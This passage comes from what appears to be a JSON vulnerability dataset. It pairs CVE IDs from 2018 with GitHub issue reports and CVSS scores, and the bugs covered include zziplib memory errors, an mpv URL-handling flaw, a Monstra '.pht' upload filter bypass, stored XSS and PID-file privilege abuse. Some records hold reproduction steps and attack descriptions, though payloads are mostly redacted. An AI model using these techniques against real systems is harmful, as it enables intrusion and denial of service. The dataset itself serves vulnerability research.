        "description": "why is it possible to execute arbitrary system commands via python code through the electrum console. wondering why it is currently possible to execute arbitrary system commands via python code through the electrum console, and why there is no whitelisting/blacklisting of allowed methods/functions as this seems like a major security issue",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-6358",
        "Issue_Url_old": "https://github.com/libming/libming/issues/104",
        "Issue_Url_new": "https://github.com/libming/libming/issues/104",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-01-26T10:13:05Z",
        "description": "Heap Buffer Overflow in listfdb (master, libming NUMBERTAG and earlier). The APITAG function (util/listfdb.c) in libming through NUMBERTAG is vulnerable to a heap buffer overflow. This vulnerability is also affecting the master branch. Reproduce: APITAG Output: ERRORTAG This may allow attackers to cause a denial of service or unspecified other impact via a crafted FDB file. You can find the reproducer FILETAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6359",
        "Issue_Url_old": "https://github.com/libming/libming/issues/105",
        "Issue_Url_new": "https://github.com/libming/libming/issues/105",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-01-27T10:51:57Z",
        "description": "heap use after free in APITAG Hello. I found a heap use after free bug in libming. Please confirm. Thanks. Summary: heap use after free OS: APITAG NUMBERTAG bit Version: APITAG APITAG Download: Steps to reproduce: APITAG the .POC files. APITAG the source code with APITAG APITAG the following command : ./swftocxx $POC /dev/null ERRORTAG ================= APITAG This work was supported by ICT R&D program of MSIP/IITP. [R NUMBERTAG Innovation hub for high Performance Computing]",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6360",
        "Issue_Url_old": "https://github.com/mpv-player/mpv/issues/5456",
        "Issue_Url_new": "https://github.com/mpv-player/mpv/issues/5456",
        "Repo_new": "mpv-player/mpv",
        "Issue_Created_At": "2018-01-27T23:44:09Z",
        "description": "Protocol whitelist in ytdl_hook. The recent commits APITAG APITAG APITAG and APITAG fix and issue whereby mpv could be convinced to play a \"non safe\" URL from a remote source. Reproduction steps An attacker convinces has the victim play an HTTP(S) URL. APITAG The URL gets processed by the FILETAG script. youtube dl attempts to extract videos from the URL by contacting the HTTP server, which responds with something like (text/html mime typed) : CODETAG As youtube dl does not perform any validation on the extracted URLs for APITAG tags, the APITAG URL gets passed back to the hook script. APITAG that there are likely many ways URLTAG in which youtube dl can return \"bad\" URLs._ The hook script then passes the extracted URL to mpv, which does not apply the usual safe protocol only checks URLTAG . As shown in the example above, this URL can be, for instance, used to APITAG URLTAG arbitrary files on the filesystem using the ffmpeg lavfi ladspa plugin.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6381",
        "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/12",
        "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/12",
        "Repo_new": "gdraheim/zziplib",
        "Issue_Created_At": "2018-01-29T05:19:41Z",
        "description": "Invalid memory access in zzip_disk_fread ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib: there is a segmentation fault caused by invalid memory access in zzip_disk_fread function ( PATHTAG ), which could be triggered by the POC below. The issue happens since with the crafted zip file, in line NUMBERTAG of zzip_disk_fread function, \"size\" variable could be much larger than the capacity of \"file >stored\". Note that this function dwells in library code, which means programs based on libzzip could be affected NUMBERTAG if (file >stored NUMBERTAG memcpy(ptr, file >stored, size NUMBERTAG file >stored += size NUMBERTAG file >avail = size NUMBERTAG return size NUMBERTAG To reproduce the issue, run: ./unzip mem $POC The POC could be downloaded at: FILETAG The backtrace is: (gdb) bt NUMBERTAG ffff NUMBERTAG ERRORTAG NUMBERTAG in __memcpy_ssse3 () from APITAG NUMBERTAG ffff7bd7cd3 in zzip_disk_fread (ptr NUMBERTAG fffffffd7b0, sized NUMBERTAG nmemb NUMBERTAG file NUMBERTAG at PATHTAG NUMBERTAG ffff7bd8a NUMBERTAG in zzip_mem_disk_fread (ptr NUMBERTAG fffffffd7b0, size NUMBERTAG nmemb NUMBERTAG file NUMBERTAG at PATHTAG NUMBERTAG c8c in zzip_mem_entry_pipe (disk NUMBERTAG entry NUMBERTAG out NUMBERTAG e0) at PATHTAG NUMBERTAG cfe in zzip_mem_entry_make (disk NUMBERTAG entry NUMBERTAG at PATHTAG NUMBERTAG b5 in zzip_mem_entry_makeall (disk NUMBERTAG at PATHTAG NUMBERTAG c7f in main (argc NUMBERTAG arg NUMBERTAG fffffffdd NUMBERTAG at PATHTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6383",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/429",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/429",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-01-29T12:59:28Z",
        "description": "'pht' extension can bypassed extension filter in uploading process. Brief of this vulnerability In uploading process, Monstra filters some of dangerous extensions using blacklist. But it is not perfect because default setting of \"libapache2 mod php5\" allow 'pht' to execute php scripts. Test Environment APITAG APITAG PHP NUMBERTAG deb8u1 (cli) Affect version NUMBERTAG Payload NUMBERTAG Save php codes with '.pht' extensions. and upload it like below. APITAG NUMBERTAG Click the uploaded file name or move to APITAG NUMBERTAG Profit! Reason of Vulnerability Default setting of php5 module for apache2(libapache2 mod php5) allow several extensions to execute as php script. This is some part of APITAG . CODETAG Because of this config, list of extension allowed to run php script is APITAG and 'phps' extension shows source code of php file. But Monstra prevent to upload php style files using extension filer in uploading process at APITAG like below. CODETAG Almost allowed extensions to execute as php can be filtered but 'pht' is not. As a result, attacker can upload malicious php file using pht extensions.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6405",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/964",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/964",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-01-30T04:23:18Z",
        "description": "coders/dcm.c Memory Leak. System Configuration APITAG version: APITAG NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: compilation with asan Description Occur Memory Leak URLTAG $ ./magick convert ~/leak1.dcm FILETAG convert: APITAG ERRORTAG PATHTAG @ PATHTAG convert: APITAG ERRORTAG APITAG @ PATHTAG convert: APITAG ERRORTAG FILETAG ' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG bd NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG d1d in APITAG ( PATHTAG NUMBERTAG dcd in APITAG ( PATHTAG NUMBERTAG c8a NUMBERTAG in APITAG ( PATHTAG NUMBERTAG af NUMBERTAG in APITAG ( PATHTAG NUMBERTAG af4ff4 in APITAG ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG ( PATHTAG NUMBERTAG e8af9 in APITAG ( PATHTAG NUMBERTAG e NUMBERTAG in main ( PATHTAG NUMBERTAG f8ea NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). $ ./magick convert ~/leak3.dcm ./a.png convert: APITAG ERRORTAG PATHTAG @ PATHTAG convert: APITAG `./a.png' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG bd NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG d1d in APITAG ( PATHTAG NUMBERTAG dcd in APITAG ( PATHTAG NUMBERTAG c NUMBERTAG in APITAG ( PATHTAG NUMBERTAG af NUMBERTAG in APITAG ( PATHTAG NUMBERTAG af4ff4 in APITAG ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG ( PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG ( PATHTAG NUMBERTAG e8af9 in APITAG ( PATHTAG NUMBERTAG e NUMBERTAG in main ( PATHTAG NUMBERTAG fb NUMBERTAG bdc NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). Crash File : FILETAG Credit : Kyeongseok Yang & Choongwoo Han, Naver Security Team",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6470",
        "Issue_Url_old": "https://github.com/dignajar/nibbleblog/issues/120",
        "Issue_Url_new": "https://github.com/dignajar/nibbleblog/issues/120",
        "Repo_new": "dignajar/nibbleblog",
        "Issue_Created_At": "2018-02-01T11:02:23Z",
        "description": "APITAG Information leak. Nibbleblog NUMBERTAG on APITAG defaults to having APITAG in each directory, causing APITAG information to leak.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-6480",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/159",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/159",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2018-01-30T10:22:49Z",
        "description": "type confusion in APITAG Hi, the following code in APITAG assumes that the union member s is of type ccnl_pktdetail_ndntlv_s . However, if the type is in fact of type struct ccnl_pktdetail_ccntlv_s or struct ccnl_pktdetail_iottlv_s , the memory at that point is either uninitialised or points to data which is not a nonce , which renders the code using the local variable nonce pointless. CODETAG This goes on and on. The function in APITAG (guarded by a USE_DUP_CHECK ) also starts to iterate over the pit and checks if the (maybe non existing nonce field) matches data in the pit, i.e. CODETAG If this is an issue how do we handle it? I would start writing checks and guards, but I want to make sure that you consider this an issue as well. TIA Michael",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6484",
        "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/14",
        "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/14",
        "Repo_new": "gdraheim/zziplib",
        "Issue_Created_At": "2018-02-01T03:19:18Z",
        "description": "Bus error in __zzip_fetch_disk_trailer ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib: there is a bus error caused by loading of misaligned address in __zzip_fetch_disk_trailer function of PATHTAG which could be triggered by the POC below. The issue happens since the struct zzip_disk_trailer \"orig\" (line NUMBERTAG could be manipulated by a crafted zip file, resulting in a misaligned memory access and bus error. Note that the issue is in libzip and may affect downstream programs. The POC is as small as NUMBERTAG bytes NUMBERTAG struct zzip_disk_trailer orig NUMBERTAG struct zzip_disk_trailer ) tail NUMBERTAG trailer >zz_rootseek = APITAG To reproduce the issue, run: ./zzdir $POC The POC could be downloaded at: FILETAG PATHTAG runtime error: load of misaligned address NUMBERTAG f NUMBERTAG d NUMBERTAG a NUMBERTAG for type 'uint NUMBERTAG t', which requires NUMBERTAG byte alignment NUMBERTAG f NUMBERTAG d NUMBERTAG a NUMBERTAG note: pointer points here NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6536",
        "Issue_Url_old": "https://github.com/Icinga/icinga2/issues/5991",
        "Issue_Url_new": "https://github.com/icinga/icinga2/issues/5991",
        "Repo_new": "icinga/icinga2",
        "Issue_Created_At": "2018-01-16T18:53:37Z",
        "description": "Partial privilege escalation via PID file manipulation. The icinga2 daemon creates its PID file after dropping privileges to the APITAG . That may be exploited through the init script (or other management tools) by the APITAG to kill root processes, since when the daemon is stopped, root sends a \"kill\" signal to the contents of the PID file (which are under the control of the runtime user). For example, APITAG However, the init script ( APITAG ) is executed as root, and does, ERRORTAG If the daemon is in any way compromised, the APITAG can write a PID of his choice into his own PID file. The next time the icinga2 service is stopped, his desired PID will be killed. That can be abused to kill off sshd, to reboot the machine, etc. The \"easy\" way to work around this problem is to create the PID file as root, before dropping privileges. That comes with its own set of problems, in particular that you won't be able to modify or delete the PID file in the forked (non root) process. It does however allow a very dumb, portable, init script to handle the PID file safely.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-6540",
        "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/15",
        "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/15",
        "Repo_new": "gdraheim/zziplib",
        "Issue_Created_At": "2018-02-01T14:09:11Z",
        "description": "Bus error in zzip_disk_findfirst ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib: there is a bus error caused by loading of misaligned address in zzip_disk_findfirst function of PATHTAG which could be triggered by the POC below. Note that this issue is different from CVETAG . The issue happens since the pointer \"trailer\" (line NUMBERTAG could be manipulated by a crafted zip file, resulting in a misaligned memory access and bus error. Note that the issue is in libzip and may affect downstream programs. The POC is as small as NUMBERTAG bytes NUMBERTAG struct zzip_disk_trailer trailer = (struct zzip_disk_trailer ) p NUMBERTAG zzip_size_t rootseek = APITAG To reproduce the issue, run: ./unzip mem p $POC The POC could be downloaded at: FILETAG PATHTAG runtime error: load of misaligned address NUMBERTAG fc NUMBERTAG f2 for type 'uint NUMBERTAG t', which requires NUMBERTAG byte alignment NUMBERTAG fc NUMBERTAG f2: note: pointer points here NUMBERTAG b5 b5 b5 b5 b5 b5 b NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6541",
        "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/16",
        "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/16",
        "Repo_new": "gdraheim/zziplib",
        "Issue_Created_At": "2018-02-01T16:17:31Z",
        "description": "Bus error when handling disk NUMBERTAG trailer in __zzip_fetch_disk_trailer ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib: there is a bus error caused by loading of misaligned address when handling disk NUMBERTAG trailer local entries in __zzip_fetch_disk_trailer function of PATHTAG which could be triggered by the POC below. The issue happens since the struct zzip_disk_trailer \"orig\" (line NUMBERTAG could be manipulated by a crafted zip file, resulting in a misaligned memory access and bus error. Note that the issue is in libzip and may affect downstream programs. This issue is different from CVETAG , and arises when invoking a different function NUMBERTAG APITAG NUMBERTAG trailer >zz_finalentries NUMBERTAG APITAG To reproduce the issue, run: ./unzzip p $POC FILETAG PATHTAG runtime error: load of misaligned address NUMBERTAG f1d4f NUMBERTAG for type 'uint NUMBERTAG t', which requires NUMBERTAG byte alignment NUMBERTAG f1d4f NUMBERTAG note: pointer points here NUMBERTAG dd e NUMBERTAG a NUMBERTAG b NUMBERTAG dd e NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6542",
        "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/17",
        "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/17",
        "Repo_new": "gdraheim/zziplib",
        "Issue_Created_At": "2018-02-01T16:17:35Z",
        "description": "Bus error when handling (root seek of disk NUMBERTAG trailer) in zzip_disk_findfirst ( PATHTAG ) . On latest version NUMBERTAG and master branch of zziplib: there is a bus error (when handling seek of disk NUMBERTAG trailer) caused by loading of misaligned address in zzip_disk_findfirst function of PATHTAG which could be triggered by the POC below. Note that this issue is different from URLTAG The issue happens since the pointer \"trailer\" (line NUMBERTAG could be manipulated by a crafted zip file, resulting in a misaligned memory access and bus error. Note that the issue is in libzip and may affect downstream programs. The POC is as small as NUMBERTAG bytes NUMBERTAG zzip_size_t rootseek = APITAG To reproduce the issue, run: ./unzip mem p $POC The POC could be downloaded at: FILETAG PATHTAG runtime error: load of misaligned address NUMBERTAG f NUMBERTAG f NUMBERTAG e NUMBERTAG for type 'uint NUMBERTAG t', which requires NUMBERTAG byte alignment NUMBERTAG f NUMBERTAG f NUMBERTAG e NUMBERTAG note: pointer points here NUMBERTAG d NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6550",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/427",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/427",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-01-23T10:58:03Z",
        "description": "Stored Cross Site Scripting Vulnerability . Hi, I have found a stored XSS vulnerability. Affected Version NUMBERTAG or before Affected URL: FILETAG Payload ERRORTAG Steps to replicate NUMBERTAG Goto URLTAG NUMBERTAG Create a new page NUMBERTAG Navigate to link section NUMBERTAG Enter payload as shown in above section NUMBERTAG isit FILETAG NUMBERTAG You will triage APITAG execution Impacts: A user with editor level privileges can make APITAG code execution in admin's session. Testing Environment NUMBERTAG Server: Apache NUMBERTAG PHP NUMBERTAG Mitigation: Pass user input from below mentioned function ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-6558",
        "Issue_Url_old": "https://github.com/google/fscrypt/issues/77",
        "Issue_Url_new": "https://github.com/google/fscrypt/issues/77",
        "Repo_new": "google/fscrypt",
        "Issue_Created_At": "2018-01-23T18:16:14Z",
        "description": "pam_fscrypt messes up user groups during login. I've added APITAG to APITAG (on Arch Linux) as described in the README: CODETAG With APITAG enabled, I'm no longer in the wheel group after login for some reason, which means I can no longer use sudo . Instead, it adds me to the root group: APITAG With APITAG commented out: APITAG Log: ERRORTAG Any ideas? :)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6574",
        "Issue_Url_old": "https://github.com/golang/go/issues/23672",
        "Issue_Url_new": "https://github.com/golang/go/issues/23672",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2018-02-02T21:36:18Z",
        "description": "security: issue [Go NUMBERTAG rc1]. Placeholder issue for cause of next week's security release. Will be filled in at release time. /cc MENTIONTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-6594",
        "Issue_Url_old": "https://github.com/dlitz/pycrypto/issues/253",
        "Issue_Url_new": "https://github.com/pycrypto/pycrypto/issues/253",
        "Repo_new": "pycrypto/pycrypto",
        "Issue_Created_At": "2018-02-02T05:45:26Z",
        "description": "Attack on APITAG APITAG Encryption with Proof of Concept APITAG Joint work with MENTIONTAG We attack APITAG URLTAG , a successor of APITAG The result is transferable. I repeat our post URLTAG here again: The textbook APITAG implementation is not secure. APITAG and its relevant implementations, APITAG and libgcrypt, use the wrong algorithm. I would give the basic idea as follows. Readers with modern algebra background can jump to MENTIONTAG 's explanation here URLTAG . The wrong implementation has two messages classes. Due to technical reasons, all messages are classified into two classes. A random message belongs to one of them (with NUMBERTAG possibility). FILETAG In some applications, there are only several possible messages. Consider we are sending a military message. There are only two outcomes: the army moved forward or retracted. With a high possibility, they belong to different classes. Encrypt the two messages. We now encrypt two messages with APITAG FILETAG The encrypted result is called a ciphertext. It should reveal NO information about the original message. Expectation: encrypted message has indistinguishability. We expect a secure encryption scheme to provide message indistinguishability. No adversary can learn what is encrypted inside the ciphertext better than a random guess. FILETAG Let us assume the headquarter sent the second message no adversary should to able to learn. Truth: the adversary can distinguish messages in two different classes. Due to the wrong implementation, the adversary can distinguish messages in different classes. FILETAG If the outcomes differ in which classes they belong to, then an adversary can infer more information. Proof of Concept APITAG We release our attack code in this APITAG repo: URLTAG A running trace is collected by Travis CI: URLTAG Showing that our adversary makes NUMBERTAG mistakes in guessing the messages if the two outcomes differ in the classes they belong to. Discussion The problem can be fixed by using APITAG carefully on the correct algebra group. Some results are given by MENTIONTAG and me on issue URLTAG . This bug is prevalent. It exists in legacy APITAG and libgcrypt (if used directly to encrypt messages).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-6616",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1059",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1059",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2018-02-04T20:07:05Z",
        "description": "Excessive Iteration in opj_t1_encode_cblks ( PATHTAG ). On the latest version NUMBERTAG and master branch of openjpeg, there is an excessive iteration in the opj_t1_encode_cblks function of PATHTAG which could be triggered by the POC below. Note that processing the POC of only NUMBERTAG bytes could cost openjpeg more than NUMBERTAG minutes. We found, in the code, the program is stuck in a NUMBERTAG level \"for\" loops of opj_t1_encode_cblks function. The terminating variables of these loops could be manipulated by the input file. Although the variables are quite reasonable (with prc >cw prc >ch NUMBERTAG the program gives no response for a long time and it causes denial of service. This issue is different from URLTAG which has been fixed in commit NUMBERTAG OPJ_BOOL opj_t1_encode_cblks(opj_t1_t t NUMBERTAG for (compno NUMBERTAG compno < tile >numcomps; ++compno NUMBERTAG for (resno NUMBERTAG resno < tilec >numresolutions; ++resno NUMBERTAG for (bandno NUMBERTAG bandno < res >numbands; ++bandno NUMBERTAG for (precno NUMBERTAG precno < res >pw res >ph; ++precno NUMBERTAG for (cblkno NUMBERTAG cblkno < prc >cw prc >ch; ++cblkno NUMBERTAG cblkno NUMBERTAG precno NUMBERTAG bandno NUMBERTAG resno NUMBERTAG compno NUMBERTAG return OPJ_TRUE NUMBERTAG To reproduce the issue, run: ./opj_compress n NUMBERTAG i $POC o /tmp/null.j2k POC: FILETAG Stack trace NUMBERTAG ffff NUMBERTAG a NUMBERTAG a in opj_t1_enc_sigpass_step (t NUMBERTAG bec0, flagsp NUMBERTAG a NUMBERTAG f4ac, datap NUMBERTAG fffdc NUMBERTAG a NUMBERTAG bpno NUMBERTAG one NUMBERTAG nmsedec NUMBERTAG fffffff7c NUMBERTAG type NUMBERTAG ci NUMBERTAG sc NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG ab in opj_t1_enc_sigpass (t NUMBERTAG bec0, bpno NUMBERTAG nmsedec NUMBERTAG fffffff7c NUMBERTAG type NUMBERTAG cblksty NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG ff1f8 in opj_t1_encode_cblk (t NUMBERTAG bec0, cblk NUMBERTAG d NUMBERTAG d7f NUMBERTAG orient NUMBERTAG compno NUMBERTAG level NUMBERTAG qmfbid NUMBERTAG stepsize NUMBERTAG cblksty NUMBERTAG numcomps NUMBERTAG tile NUMBERTAG fc NUMBERTAG mct_norms NUMBERTAG ffff NUMBERTAG dc NUMBERTAG APITAG , mct_numcomps NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG fe3f1 in opj_t1_encode_cblks (t NUMBERTAG bec0, tile NUMBERTAG fc NUMBERTAG tcp NUMBERTAG c NUMBERTAG mct_norms NUMBERTAG ffff NUMBERTAG dc NUMBERTAG APITAG , mct_numcomps NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG a in opj_tcd_t1_encode (p_tcd NUMBERTAG b NUMBERTAG af NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG dcf1 in opj_tcd_encode_tile (p_tcd NUMBERTAG b NUMBERTAG af NUMBERTAG p_tile_no NUMBERTAG p_dest NUMBERTAG fff NUMBERTAG e NUMBERTAG repeats NUMBERTAG times>..., APITAG p_max_length NUMBERTAG p_cstr_info NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG ccadf in opj_j2k_write_sod (p_j2k NUMBERTAG de NUMBERTAG p_tile_coder NUMBERTAG b NUMBERTAG af NUMBERTAG p_data NUMBERTAG fff NUMBERTAG e NUMBERTAG repeats NUMBERTAG times>..., APITAG p_total_data_size NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG bc in opj_j2k_write_first_tile_part (p_j2k NUMBERTAG de NUMBERTAG p_data NUMBERTAG fff NUMBERTAG c PATHTAG NUMBERTAG repeats NUMBERTAG times>..., APITAG p_total_data_size NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG be in opj_j2k_post_write_tile (p_j2k NUMBERTAG de NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG e0 in opj_j2k_encode (p_j2k NUMBERTAG de NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG e in opj_encode (p_info NUMBERTAG e NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG at PATHTAG NUMBERTAG f4b6 in main (argc NUMBERTAG arg NUMBERTAG fffffffdcf8) at PATHTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-6656",
        "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/175",
        "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/175",
        "Repo_new": "zblogcn/zblogphp",
        "Issue_Created_At": "2018-02-06T03:50:27Z",
        "description": "Z APITAG CSRF \u5220\u9664users\u76ee\u5f55\u53ca\u6587\u4ef6\u9020\u6210\u7f51\u7ad9\u7f3a\u5c11\u6587\u4ef6\u65e0\u6cd5\u6b63\u5e38\u8bbf\u95ee. PATHTAG \u6f0f\u6d1e\u4ee3\u7801\u5904\uff1a if($blogversion NUMBERTAG app=$zbp APITAG $_GET['id']); if($app >type == $_GET['type']){ if($app APITAG $app APITAG } } }else{ function rrmdir($dir) { if (is_dir($dir)) { $objects = scandir($dir); foreach ($objects as $object) { if ($object != '.' && $object != '..') { if (filetype($dir . '/' . $object) == 'dir') { rrmdir($dir . '/' . $object); } else { unlink($dir . '/' . $object); } } } reset($objects); rmdir($dir); } } \u5982\u679c\u6ee1\u8db3\u5224\u65ad\u6761\u4ef6 APITAG \u5220\u9664\u65b9\u6cd5 \u5982\u679c\u4e0d\u6ee1\u8db3\u6267\u884celse\u4e0b\u9762\u5220\u9664\u65b9\u6cd5 APITAG PATHTAG NUMBERTAG public function APITAG { global $zbp; rrmdir($zbp >usersdir . $this >type . '/' . $this >id); $this APITAG } PATHTAG \u6d4b\u8bd5\u8fc7\u7a0b\uff1a APITAG \u6761\u4ef6\uff1a \u9700\u8981\u7ba1\u7406\u5458\u767b\u5f55",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6767",
